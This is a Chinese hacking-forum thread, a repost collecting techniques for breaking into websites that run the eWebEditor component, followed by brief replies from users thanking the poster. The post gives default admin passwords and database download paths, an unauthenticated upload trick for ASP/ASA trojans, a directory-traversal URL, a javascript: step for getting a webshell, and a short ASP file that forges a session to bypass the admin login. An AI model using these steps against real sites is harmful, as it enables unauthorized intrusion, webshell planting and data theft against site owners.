返回列表 发帖

[转载] Ewebedit入侵大集合

Ewebeditor拿站的新技巧
Ewebeditor大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db/ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的几率能拿下目标!
-------------------------------------------------------------------------------------
eWebEditor的另类入侵
有一个办法可以在没有登陆eWebEditor的情况下传我们的ASP或ASA木马,但是前提条件是在数据库中的eWebeditor_Style表中上传类型有aaspsp或asa等后缀,如果有,用ewebeditor.asp来上传,它的语法是:http://网站名/ewebeditor/ewebeditor.asp?id=S_ID&style=S_Name,其中S_ID是在eWebeditor_Style表中有aaspsp或asa后缀的那一行的S_ID,S_Name是在eWebeditor_Style表中有aaspsp或asa后缀的那一行的S_Name字段名称。出现我们熟悉的eWebSoft在线编辑器的界面,就可以在相应的有aaspsp或asa等后缀的类型中上传了相应的asp或asa木马。
    这种情况也是存在的,大都是先前网站被人入侵过,管理员把admin_login.asp、admin_style.asp、admin_default.asp等文件删了,但是忘了删除数据库中的aaspsp或asa等后缀,这样就造成可以不用登陆就可以上传木马。或者是入侵者修改密码,密码破解不了,但是他忘了擦掉脚印了
-------------------------------------------------------------------------------------

ewebeditor后台地址: ewebeditor/admin_login.asp 默认用户名 密码都是 admin admin
ewebeditor数据库地址: DB/Ewebeditor.mdb

1
ewebeditor遍历路径漏洞(当数据库只读的时候)
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.xxxxx.com/../.. 看到整个网站文件了

2
进入后台添加aaspsp文件,可以直接上传asp文件。

3
打开eWebEditorNet/upload.aspx,选择一个cer文件。
再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。
4

:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp
本帖隐藏的内容需要回复才可以浏览
1

评分人数

呵呵。。偶来学习哈

TOP

顶顶了  收藏

TOP

不错,可是自己遇到的都很邪门,

TOP

呵呵   看看还有些啥

TOP

顶顶了  学过

TOP

免费用户嘛  理所当然。。。。
10字节写啥

TOP

很不错。。。

  追得收藏....

TOP

这个我要。。。。。。。最近遇到很多 webeditor 不过貌似都成功了 不过我不嫌方法多 嘎嘎
10字节写啥

TOP

返回列表